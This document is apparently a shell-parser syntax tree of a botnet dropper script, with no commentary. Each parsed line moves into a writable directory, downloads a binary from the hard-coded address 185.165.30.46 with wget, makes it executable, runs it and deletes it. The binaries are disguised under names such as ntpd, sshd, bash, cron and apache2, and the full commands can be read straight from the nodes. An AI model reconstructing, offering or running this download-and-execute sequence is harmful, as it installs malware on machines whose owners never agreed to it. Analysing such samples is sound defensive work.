ListNode(lineno=2, pos=(13, 135), parts=[
  CommandNode(lineno=2, pos=(13, 20), parts=[
    WordNode(lineno=2, pos=(13, 15), word='cd'),
    WordNode(lineno=2, pos=(16, 20), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(21, 23)),
  CommandNode(lineno=2, pos=(24, 35), parts=[
    WordNode(lineno=2, pos=(24, 26), word='cd'),
    WordNode(lineno=2, pos=(27, 35), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(36, 38)),
  CommandNode(lineno=2, pos=(39, 46), parts=[
    WordNode(lineno=2, pos=(39, 41), word='cd'),
    WordNode(lineno=2, pos=(42, 46), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(47, 49)),
  CommandNode(lineno=2, pos=(50, 58), parts=[
    WordNode(lineno=2, pos=(50, 52), word='cd'),
    WordNode(lineno=2, pos=(53, 58), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(59, 61)),
  CommandNode(lineno=2, pos=(62, 66), parts=[
    WordNode(lineno=2, pos=(62, 64), word='cd'),
    WordNode(lineno=2, pos=(65, 66), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(66, 67)),
  CommandNode(lineno=2, pos=(68, 98), parts=[
    WordNode(lineno=2, pos=(68, 72), word='wget'),
    WordNode(lineno=2, pos=(73, 98), word='http://185.165.30.46/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(98, 99)),
  CommandNode(lineno=2, pos=(100, 113), parts=[
    WordNode(lineno=2, pos=(100, 105), word='chmod'),
    WordNode(lineno=2, pos=(106, 108), word='+x'),
    WordNode(lineno=2, pos=(109, 113), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(113, 114)),
  CommandNode(lineno=2, pos=(115, 121), parts=[
    WordNode(lineno=2, pos=(115, 121), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(121, 122)),
  CommandNode(lineno=2, pos=(123, 135), parts=[
    WordNode(lineno=2, pos=(123, 125), word='rm'),
    WordNode(lineno=2, pos=(126, 129), word='-rf'),
    WordNode(lineno=2, pos=(130, 135), word='ntpd\r'),
  ]),
])
ListNode(lineno=3, pos=(136, 258), parts=[
  CommandNode(lineno=3, pos=(136, 143), parts=[
    WordNode(lineno=3, pos=(136, 138), word='cd'),
    WordNode(lineno=3, pos=(139, 143), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(144, 146)),
  CommandNode(lineno=3, pos=(147, 158), parts=[
    WordNode(lineno=3, pos=(147, 149), word='cd'),
    WordNode(lineno=3, pos=(150, 158), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(159, 161)),
  CommandNode(lineno=3, pos=(162, 169), parts=[
    WordNode(lineno=3, pos=(162, 164), word='cd'),
    WordNode(lineno=3, pos=(165, 169), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(170, 172)),
  CommandNode(lineno=3, pos=(173, 181), parts=[
    WordNode(lineno=3, pos=(173, 175), word='cd'),
    WordNode(lineno=3, pos=(176, 181), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(182, 184)),
  CommandNode(lineno=3, pos=(185, 189), parts=[
    WordNode(lineno=3, pos=(185, 187), word='cd'),
    WordNode(lineno=3, pos=(188, 189), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(189, 190)),
  CommandNode(lineno=3, pos=(191, 221), parts=[
    WordNode(lineno=3, pos=(191, 195), word='wget'),
    WordNode(lineno=3, pos=(196, 221), word='http://185.165.30.46/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(221, 222)),
  CommandNode(lineno=3, pos=(223, 236), parts=[
    WordNode(lineno=3, pos=(223, 228), word='chmod'),
    WordNode(lineno=3, pos=(229, 231), word='+x'),
    WordNode(lineno=3, pos=(232, 236), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(236, 237)),
  CommandNode(lineno=3, pos=(238, 244), parts=[
    WordNode(lineno=3, pos=(238, 244), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(244, 245)),
  CommandNode(lineno=3, pos=(246, 258), parts=[
    WordNode(lineno=3, pos=(246, 248), word='rm'),
    WordNode(lineno=3, pos=(249, 252), word='-rf'),
    WordNode(lineno=3, pos=(253, 258), word='sshd\r'),
  ]),
])
ListNode(lineno=4, pos=(259, 393), parts=[
  CommandNode(lineno=4, pos=(259, 266), parts=[
    WordNode(lineno=4, pos=(259, 261), word='cd'),
    WordNode(lineno=4, pos=(262, 266), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(267, 269)),
  CommandNode(lineno=4, pos=(270, 281), parts=[
    WordNode(lineno=4, pos=(270, 272), word='cd'),
    WordNode(lineno=4, pos=(273, 281), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(282, 284)),
  CommandNode(lineno=4, pos=(285, 292), parts=[
    WordNode(lineno=4, pos=(285, 287), word='cd'),
    WordNode(lineno=4, pos=(288, 292), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(293, 295)),
  CommandNode(lineno=4, pos=(296, 304), parts=[
    WordNode(lineno=4, pos=(296, 298), word='cd'),
    WordNode(lineno=4, pos=(299, 304), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(305, 307)),
  CommandNode(lineno=4, pos=(308, 312), parts=[
    WordNode(lineno=4, pos=(308, 310), word='cd'),
    WordNode(lineno=4, pos=(311, 312), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(312, 313)),
  CommandNode(lineno=4, pos=(314, 347), parts=[
    WordNode(lineno=4, pos=(314, 318), word='wget'),
    WordNode(lineno=4, pos=(319, 347), word='http://185.165.30.46/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(347, 348)),
  CommandNode(lineno=4, pos=(349, 365), parts=[
    WordNode(lineno=4, pos=(349, 354), word='chmod'),
    WordNode(lineno=4, pos=(355, 357), word='+x'),
    WordNode(lineno=4, pos=(358, 365), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(365, 366)),
  CommandNode(lineno=4, pos=(367, 376), parts=[
    WordNode(lineno=4, pos=(367, 376), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(376, 377)),
  CommandNode(lineno=4, pos=(378, 393), parts=[
    WordNode(lineno=4, pos=(378, 380), word='rm'),
    WordNode(lineno=4, pos=(381, 384), word='-rf'),
    WordNode(lineno=4, pos=(385, 393), word='openssh\r'),
  ]),
])
ListNode(lineno=5, pos=(394, 516), parts=[
  CommandNode(lineno=5, pos=(394, 401), parts=[
    WordNode(lineno=5, pos=(394, 396), word='cd'),
    WordNode(lineno=5, pos=(397, 401), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(402, 404)),
  CommandNode(lineno=5, pos=(405, 416), parts=[
    WordNode(lineno=5, pos=(405, 407), word='cd'),
    WordNode(lineno=5, pos=(408, 416), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(417, 419)),
  CommandNode(lineno=5, pos=(420, 427), parts=[
    WordNode(lineno=5, pos=(420, 422), word='cd'),
    WordNode(lineno=5, pos=(423, 427), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(428, 430)),
  CommandNode(lineno=5, pos=(431, 439), parts=[
    WordNode(lineno=5, pos=(431, 433), word='cd'),
    WordNode(lineno=5, pos=(434, 439), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(440, 442)),
  CommandNode(lineno=5, pos=(443, 447), parts=[
    WordNode(lineno=5, pos=(443, 445), word='cd'),
    WordNode(lineno=5, pos=(446, 447), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(447, 448)),
  CommandNode(lineno=5, pos=(449, 479), parts=[
    WordNode(lineno=5, pos=(449, 453), word='wget'),
    WordNode(lineno=5, pos=(454, 479), word='http://185.165.30.46/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(479, 480)),
  CommandNode(lineno=5, pos=(481, 494), parts=[
    WordNode(lineno=5, pos=(481, 486), word='chmod'),
    WordNode(lineno=5, pos=(487, 489), word='+x'),
    WordNode(lineno=5, pos=(490, 494), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(494, 495)),
  CommandNode(lineno=5, pos=(496, 502), parts=[
    WordNode(lineno=5, pos=(496, 502), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(502, 503)),
  CommandNode(lineno=5, pos=(504, 516), parts=[
    WordNode(lineno=5, pos=(504, 506), word='rm'),
    WordNode(lineno=5, pos=(507, 510), word='-rf'),
    WordNode(lineno=5, pos=(511, 516), word='bash\r'),
  ]),
])
ListNode(lineno=6, pos=(517, 639), parts=[
  CommandNode(lineno=6, pos=(517, 524), parts=[
    WordNode(lineno=6, pos=(517, 519), word='cd'),
    WordNode(lineno=6, pos=(520, 524), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(525, 527)),
  CommandNode(lineno=6, pos=(528, 539), parts=[
    WordNode(lineno=6, pos=(528, 530), word='cd'),
    WordNode(lineno=6, pos=(531, 539), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(540, 542)),
  CommandNode(lineno=6, pos=(543, 550), parts=[
    WordNode(lineno=6, pos=(543, 545), word='cd'),
    WordNode(lineno=6, pos=(546, 550), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(551, 553)),
  CommandNode(lineno=6, pos=(554, 562), parts=[
    WordNode(lineno=6, pos=(554, 556), word='cd'),
    WordNode(lineno=6, pos=(557, 562), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(563, 565)),
  CommandNode(lineno=6, pos=(566, 570), parts=[
    WordNode(lineno=6, pos=(566, 568), word='cd'),
    WordNode(lineno=6, pos=(569, 570), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(570, 571)),
  CommandNode(lineno=6, pos=(572, 602), parts=[
    WordNode(lineno=6, pos=(572, 576), word='wget'),
    WordNode(lineno=6, pos=(577, 602), word='http://185.165.30.46/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(602, 603)),
  CommandNode(lineno=6, pos=(604, 617), parts=[
    WordNode(lineno=6, pos=(604, 609), word='chmod'),
    WordNode(lineno=6, pos=(610, 612), word='+x'),
    WordNode(lineno=6, pos=(613, 617), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(617, 618)),
  CommandNode(lineno=6, pos=(619, 625), parts=[
    WordNode(lineno=6, pos=(619, 625), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(625, 626)),
  CommandNode(lineno=6, pos=(627, 639), parts=[
    WordNode(lineno=6, pos=(627, 629), word='rm'),
    WordNode(lineno=6, pos=(630, 633), word='-rf'),
    WordNode(lineno=6, pos=(634, 639), word='tftp\r'),
  ]),
])
ListNode(lineno=7, pos=(640, 762), parts=[
  CommandNode(lineno=7, pos=(640, 647), parts=[
    WordNode(lineno=7, pos=(640, 642), word='cd'),
    WordNode(lineno=7, pos=(643, 647), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(648, 650)),
  CommandNode(lineno=7, pos=(651, 662), parts=[
    WordNode(lineno=7, pos=(651, 653), word='cd'),
    WordNode(lineno=7, pos=(654, 662), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(663, 665)),
  CommandNode(lineno=7, pos=(666, 673), parts=[
    WordNode(lineno=7, pos=(666, 668), word='cd'),
    WordNode(lineno=7, pos=(669, 673), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(674, 676)),
  CommandNode(lineno=7, pos=(677, 685), parts=[
    WordNode(lineno=7, pos=(677, 679), word='cd'),
    WordNode(lineno=7, pos=(680, 685), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(686, 688)),
  CommandNode(lineno=7, pos=(689, 693), parts=[
    WordNode(lineno=7, pos=(689, 691), word='cd'),
    WordNode(lineno=7, pos=(692, 693), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(693, 694)),
  CommandNode(lineno=7, pos=(695, 725), parts=[
    WordNode(lineno=7, pos=(695, 699), word='wget'),
    WordNode(lineno=7, pos=(700, 725), word='http://185.165.30.46/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(725, 726)),
  CommandNode(lineno=7, pos=(727, 740), parts=[
    WordNode(lineno=7, pos=(727, 732), word='chmod'),
    WordNode(lineno=7, pos=(733, 735), word='+x'),
    WordNode(lineno=7, pos=(736, 740), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(740, 741)),
  CommandNode(lineno=7, pos=(742, 748), parts=[
    WordNode(lineno=7, pos=(742, 748), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(748, 749)),
  CommandNode(lineno=7, pos=(750, 762), parts=[
    WordNode(lineno=7, pos=(750, 752), word='rm'),
    WordNode(lineno=7, pos=(753, 756), word='-rf'),
    WordNode(lineno=7, pos=(757, 762), word='wget\r'),
  ]),
])
ListNode(lineno=8, pos=(763, 885), parts=[
  CommandNode(lineno=8, pos=(763, 770), parts=[
    WordNode(lineno=8, pos=(763, 765), word='cd'),
    WordNode(lineno=8, pos=(766, 770), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(771, 773)),
  CommandNode(lineno=8, pos=(774, 785), parts=[
    WordNode(lineno=8, pos=(774, 776), word='cd'),
    WordNode(lineno=8, pos=(777, 785), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(786, 788)),
  CommandNode(lineno=8, pos=(789, 796), parts=[
    WordNode(lineno=8, pos=(789, 791), word='cd'),
    WordNode(lineno=8, pos=(792, 796), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(797, 799)),
  CommandNode(lineno=8, pos=(800, 808), parts=[
    WordNode(lineno=8, pos=(800, 802), word='cd'),
    WordNode(lineno=8, pos=(803, 808), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(809, 811)),
  CommandNode(lineno=8, pos=(812, 816), parts=[
    WordNode(lineno=8, pos=(812, 814), word='cd'),
    WordNode(lineno=8, pos=(815, 816), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(816, 817)),
  CommandNode(lineno=8, pos=(818, 848), parts=[
    WordNode(lineno=8, pos=(818, 822), word='wget'),
    WordNode(lineno=8, pos=(823, 848), word='http://185.165.30.46/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(848, 849)),
  CommandNode(lineno=8, pos=(850, 863), parts=[
    WordNode(lineno=8, pos=(850, 855), word='chmod'),
    WordNode(lineno=8, pos=(856, 858), word='+x'),
    WordNode(lineno=8, pos=(859, 863), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(863, 864)),
  CommandNode(lineno=8, pos=(865, 871), parts=[
    WordNode(lineno=8, pos=(865, 871), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(871, 872)),
  CommandNode(lineno=8, pos=(873, 885), parts=[
    WordNode(lineno=8, pos=(873, 875), word='rm'),
    WordNode(lineno=8, pos=(876, 879), word='-rf'),
    WordNode(lineno=8, pos=(880, 885), word='cron\r'),
  ]),
])
ListNode(lineno=9, pos=(886, 1004), parts=[
  CommandNode(lineno=9, pos=(886, 893), parts=[
    WordNode(lineno=9, pos=(886, 888), word='cd'),
    WordNode(lineno=9, pos=(889, 893), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(894, 896)),
  CommandNode(lineno=9, pos=(897, 908), parts=[
    WordNode(lineno=9, pos=(897, 899), word='cd'),
    WordNode(lineno=9, pos=(900, 908), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(909, 911)),
  CommandNode(lineno=9, pos=(912, 919), parts=[
    WordNode(lineno=9, pos=(912, 914), word='cd'),
    WordNode(lineno=9, pos=(915, 919), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(920, 922)),
  CommandNode(lineno=9, pos=(923, 931), parts=[
    WordNode(lineno=9, pos=(923, 925), word='cd'),
    WordNode(lineno=9, pos=(926, 931), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(932, 934)),
  CommandNode(lineno=9, pos=(935, 939), parts=[
    WordNode(lineno=9, pos=(935, 937), word='cd'),
    WordNode(lineno=9, pos=(938, 939), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(939, 940)),
  CommandNode(lineno=9, pos=(941, 970), parts=[
    WordNode(lineno=9, pos=(941, 945), word='wget'),
    WordNode(lineno=9, pos=(946, 970), word='http://185.165.30.46/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(970, 971)),
  CommandNode(lineno=9, pos=(972, 984), parts=[
    WordNode(lineno=9, pos=(972, 977), word='chmod'),
    WordNode(lineno=9, pos=(978, 980), word='+x'),
    WordNode(lineno=9, pos=(981, 984), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(984, 985)),
  CommandNode(lineno=9, pos=(986, 991), parts=[
    WordNode(lineno=9, pos=(986, 991), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(991, 992)),
  CommandNode(lineno=9, pos=(993, 1004), parts=[
    WordNode(lineno=9, pos=(993, 995), word='rm'),
    WordNode(lineno=9, pos=(996, 999), word='-rf'),
    WordNode(lineno=9, pos=(1000, 1004), word='ftp\r'),
  ]),
])
ListNode(lineno=10, pos=(1005, 1127), parts=[
  CommandNode(lineno=10, pos=(1005, 1012), parts=[
    WordNode(lineno=10, pos=(1005, 1007), word='cd'),
    WordNode(lineno=10, pos=(1008, 1012), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1013, 1015)),
  CommandNode(lineno=10, pos=(1016, 1027), parts=[
    WordNode(lineno=10, pos=(1016, 1018), word='cd'),
    WordNode(lineno=10, pos=(1019, 1027), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1028, 1030)),
  CommandNode(lineno=10, pos=(1031, 1038), parts=[
    WordNode(lineno=10, pos=(1031, 1033), word='cd'),
    WordNode(lineno=10, pos=(1034, 1038), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1039, 1041)),
  CommandNode(lineno=10, pos=(1042, 1050), parts=[
    WordNode(lineno=10, pos=(1042, 1044), word='cd'),
    WordNode(lineno=10, pos=(1045, 1050), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1051, 1053)),
  CommandNode(lineno=10, pos=(1054, 1058), parts=[
    WordNode(lineno=10, pos=(1054, 1056), word='cd'),
    WordNode(lineno=10, pos=(1057, 1058), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1058, 1059)),
  CommandNode(lineno=10, pos=(1060, 1090), parts=[
    WordNode(lineno=10, pos=(1060, 1064), word='wget'),
    WordNode(lineno=10, pos=(1065, 1090), word='http://185.165.30.46/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1090, 1091)),
  CommandNode(lineno=10, pos=(1092, 1105), parts=[
    WordNode(lineno=10, pos=(1092, 1097), word='chmod'),
    WordNode(lineno=10, pos=(1098, 1100), word='+x'),
    WordNode(lineno=10, pos=(1101, 1105), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1105, 1106)),
  CommandNode(lineno=10, pos=(1107, 1113), parts=[
    WordNode(lineno=10, pos=(1107, 1113), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1113, 1114)),
  CommandNode(lineno=10, pos=(1115, 1127), parts=[
    WordNode(lineno=10, pos=(1115, 1117), word='rm'),
    WordNode(lineno=10, pos=(1118, 1121), word='-rf'),
    WordNode(lineno=10, pos=(1122, 1127), word='pftp\r'),
  ]),
])
ListNode(lineno=11, pos=(1128, 1242), parts=[
  CommandNode(lineno=11, pos=(1128, 1135), parts=[
    WordNode(lineno=11, pos=(1128, 1130), word='cd'),
    WordNode(lineno=11, pos=(1131, 1135), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1136, 1138)),
  CommandNode(lineno=11, pos=(1139, 1150), parts=[
    WordNode(lineno=11, pos=(1139, 1141), word='cd'),
    WordNode(lineno=11, pos=(1142, 1150), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1151, 1153)),
  CommandNode(lineno=11, pos=(1154, 1161), parts=[
    WordNode(lineno=11, pos=(1154, 1156), word='cd'),
    WordNode(lineno=11, pos=(1157, 1161), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1162, 1164)),
  CommandNode(lineno=11, pos=(1165, 1173), parts=[
    WordNode(lineno=11, pos=(1165, 1167), word='cd'),
    WordNode(lineno=11, pos=(1168, 1173), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1174, 1176)),
  CommandNode(lineno=11, pos=(1177, 1181), parts=[
    WordNode(lineno=11, pos=(1177, 1179), word='cd'),
    WordNode(lineno=11, pos=(1180, 1181), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1181, 1182)),
  CommandNode(lineno=11, pos=(1183, 1211), parts=[
    WordNode(lineno=11, pos=(1183, 1187), word='wget'),
    WordNode(lineno=11, pos=(1188, 1211), word='http://185.165.30.46/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1211, 1212)),
  CommandNode(lineno=11, pos=(1213, 1224), parts=[
    WordNode(lineno=11, pos=(1213, 1218), word='chmod'),
    WordNode(lineno=11, pos=(1219, 1221), word='+x'),
    WordNode(lineno=11, pos=(1222, 1224), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1224, 1225)),
  CommandNode(lineno=11, pos=(1226, 1230), parts=[
    WordNode(lineno=11, pos=(1226, 1230), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1230, 1231)),
  CommandNode(lineno=11, pos=(1232, 1242), parts=[
    WordNode(lineno=11, pos=(1232, 1234), word='rm'),
    WordNode(lineno=11, pos=(1235, 1238), word='-rf'),
    WordNode(lineno=11, pos=(1239, 1242), word='sh\r'),
  ]),
])
ListNode(lineno=12, pos=(1243, 1361), parts=[
  CommandNode(lineno=12, pos=(1243, 1250), parts=[
    WordNode(lineno=12, pos=(1243, 1245), word='cd'),
    WordNode(lineno=12, pos=(1246, 1250), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1251, 1253)),
  CommandNode(lineno=12, pos=(1254, 1265), parts=[
    WordNode(lineno=12, pos=(1254, 1256), word='cd'),
    WordNode(lineno=12, pos=(1257, 1265), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1266, 1268)),
  CommandNode(lineno=12, pos=(1269, 1276), parts=[
    WordNode(lineno=12, pos=(1269, 1271), word='cd'),
    WordNode(lineno=12, pos=(1272, 1276), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1277, 1279)),
  CommandNode(lineno=12, pos=(1280, 1288), parts=[
    WordNode(lineno=12, pos=(1280, 1282), word='cd'),
    WordNode(lineno=12, pos=(1283, 1288), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1289, 1291)),
  CommandNode(lineno=12, pos=(1292, 1296), parts=[
    WordNode(lineno=12, pos=(1292, 1294), word='cd'),
    WordNode(lineno=12, pos=(1295, 1296), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1296, 1297)),
  CommandNode(lineno=12, pos=(1298, 1327), parts=[
    WordNode(lineno=12, pos=(1298, 1302), word='wget'),
    WordNode(lineno=12, pos=(1303, 1327), word='http://185.165.30.46/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1327, 1328)),
  CommandNode(lineno=12, pos=(1329, 1341), parts=[
    WordNode(lineno=12, pos=(1329, 1334), word='chmod'),
    WordNode(lineno=12, pos=(1335, 1337), word='+x'),
    WordNode(lineno=12, pos=(1338, 1341), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1341, 1342)),
  CommandNode(lineno=12, pos=(1343, 1348), parts=[
    WordNode(lineno=12, pos=(1343, 1348), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1348, 1349)),
  CommandNode(lineno=12, pos=(1350, 1361), parts=[
    WordNode(lineno=12, pos=(1350, 1352), word='rm'),
    WordNode(lineno=12, pos=(1353, 1356), word='-rf'),
    WordNode(lineno=12, pos=(1357, 1361), word=' \r'),
  ]),
])
ListNode(lineno=13, pos=(1362, 1496), parts=[
  CommandNode(lineno=13, pos=(1362, 1369), parts=[
    WordNode(lineno=13, pos=(1362, 1364), word='cd'),
    WordNode(lineno=13, pos=(1365, 1369), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1370, 1372)),
  CommandNode(lineno=13, pos=(1373, 1384), parts=[
    WordNode(lineno=13, pos=(1373, 1375), word='cd'),
    WordNode(lineno=13, pos=(1376, 1384), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1385, 1387)),
  CommandNode(lineno=13, pos=(1388, 1395), parts=[
    WordNode(lineno=13, pos=(1388, 1390), word='cd'),
    WordNode(lineno=13, pos=(1391, 1395), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1396, 1398)),
  CommandNode(lineno=13, pos=(1399, 1407), parts=[
    WordNode(lineno=13, pos=(1399, 1401), word='cd'),
    WordNode(lineno=13, pos=(1402, 1407), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1408, 1410)),
  CommandNode(lineno=13, pos=(1411, 1415), parts=[
    WordNode(lineno=13, pos=(1411, 1413), word='cd'),
    WordNode(lineno=13, pos=(1414, 1415), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1415, 1416)),
  CommandNode(lineno=13, pos=(1417, 1450), parts=[
    WordNode(lineno=13, pos=(1417, 1421), word='wget'),
    WordNode(lineno=13, pos=(1422, 1450), word='http://185.165.30.46/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1450, 1451)),
  CommandNode(lineno=13, pos=(1452, 1468), parts=[
    WordNode(lineno=13, pos=(1452, 1457), word='chmod'),
    WordNode(lineno=13, pos=(1458, 1460), word='+x'),
    WordNode(lineno=13, pos=(1461, 1468), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1468, 1469)),
  CommandNode(lineno=13, pos=(1470, 1479), parts=[
    WordNode(lineno=13, pos=(1470, 1479), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1479, 1480)),
  CommandNode(lineno=13, pos=(1481, 1496), parts=[
    WordNode(lineno=13, pos=(1481, 1483), word='rm'),
    WordNode(lineno=13, pos=(1484, 1487), word='-rf'),
    WordNode(lineno=13, pos=(1488, 1496), word='apache2\r'),
  ]),
])
